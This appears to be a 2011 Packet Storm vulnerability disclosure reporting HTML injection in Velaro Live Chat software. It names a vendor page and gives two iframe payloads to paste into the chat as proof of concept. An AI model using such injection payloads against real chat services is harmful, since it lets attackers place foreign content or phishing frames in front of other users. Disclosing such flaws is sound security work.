Velaro Live Chat HTML Injection

2011-08-29T00:00:00
ID PACKETSTORM:104564
Type packetstorm
Reporter Sony
Modified 2011-08-29T00:00:00

Description

                                        
                                            `# Exploit Title: Velaro Live Chat Software Cross Site Scripting  
# Date: 29.08.2011  
# Author: Sony  
# Software Link: http://www.velaro.com/features/live-chat  
# Version: all version  
# POC:  
http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html  
  
..................................................................  
  
This is Html Code Injection in the Velaro Live Chat Software:  
  
http://www.velaro.com/Portals/0/prechat-choose.html  
  
Put our code in the chat:  
  
< iframe width="420" height="345" src="  
http://www.youtube.com/embed/dzLbdsEV9iQ" frameborder="0"  
allowfullscreen></iframe >  
  
or  
  
< iframe src="http://st2tea.blogspot.com/" >  
  
Some pics:  
  
http://i52.tinypic.com/7122hw.jpg  
  
http://i55.tinypic.com/jaklsl.jpg  
`